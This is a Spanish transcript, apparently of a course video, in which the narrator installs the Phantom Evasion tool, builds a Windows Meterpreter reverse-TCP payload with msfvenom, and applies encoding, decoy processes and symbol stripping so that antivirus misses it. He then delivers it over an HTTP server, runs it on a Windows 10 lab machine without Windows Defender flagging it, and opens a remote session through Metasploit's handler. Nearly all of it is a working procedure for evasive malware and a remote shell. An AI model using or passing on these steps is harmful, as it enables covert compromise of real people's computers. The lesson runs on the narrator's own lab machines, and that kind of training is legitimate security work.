Vamos a empezar con la instalación y veremos que una herramienta como Phantom Evasion no solamente genera malware para Windows, sino también para Linux, para Android, para iOS y para aplicaciones universales. Copio la ruta y en mi directorio hago git clone y pego esa ruta. Se generará un directorio que se denomina Phantom Evasion. De todas formas, como decíamos, tengo que cumplir antes una serie de prerequisitos. Vamos a instalarlos para evitar que luego nos aparezcan errores en el proceso de configuración. Lo primero a tener en cuenta es que puede generar payloads tanto para 32 como para 64 bits. Así que vamos a añadir como arquitectura para la búsqueda de paquetes también la de 32 bits. Actualizamos y requiere Wine para generar algunos payloads para Windows. apt install wine32 nos dice que ya lo tenemos y es la última versión, y lo mismo para 64. Si ya lo tenemos es porque se ha instalado con Build Framework. Vemos que hay una serie de archivos que nos dice que ya no son necesarios, que los podemos eliminar. Hacemos apt auto remove, le decimos que sí, liberará unos 250 megas de disco, ya se ha eliminado. Y ahora necesitamos, en ese entorno de Wine, del emulador de Windows, necesitamos Python. Para eso descargamos con wget de www.python.org /ftp/python-2714 el archivo de instalación para Windows de Python-2714. Lo descargamos. Tenía una errata. Aquí no es un guión, es una barra. Descargamos. Ya tenemos ese archivo y lo vamos a instalar en el emulador de Windows, que es Wine. Wine msi exec /i para instalar y ese archivo python-2714.msi. Se inicia la instalación. Lo instalamos para todos los usuarios. Siguiente, siguiente, siguiente y finalizamos. Podemos ir a la carpeta donde se ha instalado Wine, que es root, Wine, el emulador de la unidad C de una máquina de Windows, y Python 27. Aquí es donde se ha hecho esa instalación de Python. Vamos a instalar PyInstaller, el compilador que hemos visto antes en Veil, pero dentro de este emulador de Windows. Volvemos a Wine, python.exe, que es ese archivo que tenemos en esta carpeta, pip install PyInstaller. Ejecutamos. Ya lo tenemos. Y ahora podemos ir a nuestro directorio donde hemos creado Phantom Evasion y ejecutamos con Python phantomevasion.py. Antes de hacer esto, si nos vamos a Setup, veremos que hay un archivo que se llama config.txt. Lo abrimos y vamos a eliminar la ejecución de ese software de minado de criptomonedas. Miner, ponemos false y guardamos. De esta forma, no le daremos la opción de instalar en nuestra máquina ese software de minado de criptomonedas. Volvemos hacia atrás y hacemos Python phantomevasion.py. Empieza la instalación. Este error que aparece aquí se va a resolver instalando las librerías necesarias. Además instalará también librerías, por ejemplo para Android, para poder crear malware para Android. Aquí vemos que está instalando las herramientas necesarias para Android. Aceptamos la opción por defecto. Y ya tenemos completada la instalación de Phantom Evasion. Vemos que incluye módulos para Windows, para Linux, para Mac, para Android, universales, módulos de postexplotación. Vamos a los módulos de Windows. 1. Y ahí nos aparecen los módulos que están disponibles. Inyección de shellcode, utilizando diferentes técnicas y también PowerShell. Vamos a utilizar este módulo de inyección de shellcode utilizando técnicas de asignación virtual y sin llamada directa a esas rutinas. Usamos el 3
Aquí nos dice qué es lo que va a hacer. Para intentar que sea indetectable, le damos a Enter para continuar. Y ahora podemos elegir un shellcode o uno personalizado, como creamos antes, ese que habíamos creado en el archivo de texto, utilizando Ordnance, o bien que use directamente MSF Venom. Vamos a hacerlo sencillo. Usamos MSF Venom de Metasploit y ahora le especificamos un payload. Voy a utilizar el típico Windows Meterpreter Reverse TCP. Realmente lo que nos importa es el proceso de codificación para que sea indetectable. Indicamos el localhost, nuestra máquina de Kali. Puerto. Voy a poner el 8089, por ejemplo. Elegimos pasos de codificación y a la derecha nos dice la tasa de detección de antivirus. A medida que bajamos del 1 al 4, cada vez va a ser menos probable que un antivirus lo detecte. Vamos a utilizar el último. Nos dice que tiene una tasa excelente, es decir, que lo detectan muy pocos antivirus. Usamos el 4. Le damos un nombre al archivo de salida, por ejemplo Phantom. También nos dice que durante la ejecución en el objetivo habrá varios procesos que se van a ejecutar de forma secuencial. Solamente uno de ellos contendrá la sección de código malicioso para intentar otras técnicas que hagan que un antivirus no lo detecte. Ventaja: una menor tasa de detección, menos antivirus que lo detectan. Inconvenientes: consume más recursos. Le voy a decir que sí. Y por ejemplo que utilice 2 procesos falsos, de los 3 que podría usar como máximo. Generará el código, lo codifica, lo compila y ahora si queremos puede eliminar símbolos que no son necesarios, caracteres que no son necesarios para minimizar el tamaño del archivo, y eso también hace que sea un poco más complicado que sea detectable por un antivirus. Le decimos que sí. Ya se ha guardado ese archivo. Podemos salir de Phantom y si le echamos un vistazo al directorio, ahí tenemos el archivo que se ha generado, phantom.exe. Vamos a comprobar si funciona. Voy a crearme una carpeta. Voy a crear una carpeta, por ejemplo, que se llame Payloads. Y ahí dentro de Payloads voy a copiarme ese archivo phantom.exe. Lo copio en esta carpeta. Y aquí voy a poner a la escucha el servidor web Simple HTTP Server. Voy a comprobar si la máquina de Windows 10 es capaz de detectar ese malware. Voy a la máquina de Windows 10, abro el navegador, apunto de nuevo a la máquina de Kali, ahí tenemos phantom.exe, lo voy a descargar. Quiero descargármelo en el escritorio. De momento el antivirus aún no ha saltado. Lo guardo. Sí que me avisa de que al ser un archivo ejecutable, pues normalmente no se suele descargar y podría hacer daño, pero no lo ha detectado el antivirus. Lo tenemos aquí. Voy a ir a la máquina de Kali y crearé el handler para esperar la conexión desde este payload. Abrimos MSF Console. Voy a crear el handler. Use Exploit Multi Handler. Establecemos el payload. Windows Meterpreter Reverse TCP. Set lhost 192.168.10.155 y máquina Kali. Set lport mediante el 8089. Preguntamos las opciones. Y si ya lo tenemos configurado, lo lanzamos. Ya se ha creado el handler en el puerto 8089, esperando a que se conecte desde la máquina víctima. Volvemos a Windows 10, vemos que el antivirus no lo ha detectado. Vamos a ejecutarlo. Al haberlo descargado de Internet, Smart Screen nos vuelve a avisar de que no es una aplicación reconocida, no está firmada, y nosotros decidimos si la ejecutamos o no. Supongamos que sí que la vamos a ejecutar.
Dejamos que se ejecute. Y ahora esperamos desde la máquina Kali la conexión. Puede tardar un poco. Vamos a la máquina Kali. Y ahí vemos que se nos abre la sesión. Como decíamos, puede tardar unos minutos, pero ya tenemos abierta la sesión desde la máquina de Windows 10. La máquina 192.168.10.100. Vemos las sesiones. Ahora mismo no tengo ninguna con la que esté interactuando. Voy a interactuar con esa sesión que acabamos de cargar. Vemos que ya la tenemos. ¿Y qué podríamos hacer? ¿Qué podríamos hacer con esta sesión? Por ejemplo, podemos pedir información sobre el sistema. Vamos a pedir esa información, sysinfo, y vemos que es nuestra máquina de Windows 10, que está en el dominio de Adatum. Y aquí tenemos el resto de las opciones que nos ofrece Meterpreter. Ya las conocemos, lo hemos visto en otro curso, y aquí la parte importante era llegar a conseguir que ese malware no fuese detectable por Windows 10 con su antivirus de Windows Defender actualizado.